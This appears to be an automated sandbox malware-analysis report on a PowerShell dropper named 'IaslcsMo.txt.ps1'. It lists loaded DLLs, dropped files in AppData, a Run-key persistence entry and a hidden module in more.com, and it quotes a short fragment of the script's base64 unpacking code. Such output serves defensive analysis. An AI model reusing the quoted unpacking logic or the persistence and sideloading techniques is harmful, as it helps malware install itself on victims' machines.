Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: IaslcsMo.txt.ps1

Static file information: File size 31179107 > 1048576

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdb source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp
Source:	Binary string: msvcp100.i386.pdb source: Set-up.exe, 00000003.00000002.1986094707.000000006EEF1000.00000020.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2093630497.000000006EEF1000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: dmprocessxmlfiltered.pdbGCTL source: more.com, 00000006.00000002.2086807895.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Set-up.exe, 00000003.00000002.1984108854.00000000042C4000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1982331918.0000000003BBC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1983371696.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2082451784.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2069602277.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2089391977.000000000393A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Set-up.exe, 00000003.00000002.1984108854.00000000042C4000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1982331918.0000000003BBC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1983371696.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2082451784.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2069602277.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2089391977.000000000393A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: dmprocessxmlfiltered.pdb source: more.com, 00000006.00000002.2086807895.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdbSHA256do source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: Set-up.exe, 00000003.00000002.1986917931.000000006F851000.00000020.00000001.01000000.0000000A.sdmp, Set-up.exe, 00000008.00000002.2095256022.000000006F851000.00000020.00000001.01000000.0000000A.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($lkqUsSoM) [System.IO.File]::WriteAllBytes($tqCzfuAI, $siQuxqAO) $kzxTWYQy = New-Item -ItemType Directory -Path $avOQhqfd try { $AAIzCJGc = Expand-Archive -Path $tqCzf

Source: NAudio.dll.0.dr

Static PE information: 0xCC972473 [Sat Oct 8 12:22:11 2078 UTC]

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Code function: 3_2_6BBDB5A7 _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

3_2_6BBDB5A7

Source: QtCore4.dll.0.dr

Static PE information: real checksum: 0x283beb should be: 0x289700

Source: ffmpeg.dll.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr	Static PE information: section name: _RDATA
Source: Resource.ct.0.dr	Static PE information: section name: .gxfg
Source: Resource.ct.0.dr	Static PE information: section name: .retplne
Source: Resource.ct.0.dr	Static PE information: section name: .voltbl
Source: Resource.ct.0.dr	Static PE information: section name: CPADinfo
Source: Resource.ct.0.dr	Static PE information: section name: LZMADEC
Source: Resource.ct.0.dr	Static PE information: section name: _RDATA
Source: Resource.ct.0.dr	Static PE information: section name: malloc_h

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB6B658 push ecx; ret	3_2_6BB6B66B
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB52D88 push eax; ret	3_2_6BB52DA6
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB60CC5 push ecx; ret	3_2_6BB60CD8
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 8_2_6C1489C5 push ecx; ret	8_2_6C1489D8

Source: StarBurn.dll.0.dr	Static PE information: section name: .text entropy: 6.935927781173939
Source: msvcr100.dll.0.dr	Static PE information: section name: .text entropy: 6.9169969425576285

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	File created: C:\Users\user\AppData\Roaming\UPEC\QtNetwork4.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\gvpkoxippfwsu	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	File created: C:\Users\user\AppData\Roaming\UPEC\QtCore4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	File created: C:\Users\user\AppData\Roaming\UPEC\msvcp100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	File created: C:\Users\user\AppData\Roaming\UPEC\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	File created: C:\Users\user\AppData\Roaming\UPEC\QtGui4.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	File created: C:\Users\user\AppData\Roaming\UPEC\StarBurn.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	File created: C:\Users\user\AppData\Roaming\UPEC\QtXml4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dll	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct			Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\gvpkoxippfwsu			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\more.com

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\GVPKOXIPPFWSU

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: txt.ps1

Static PE information: IaslcsMo.txt.ps1

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Code function: 3_2_6BBAA3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,

3_2_6BBAA3DD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
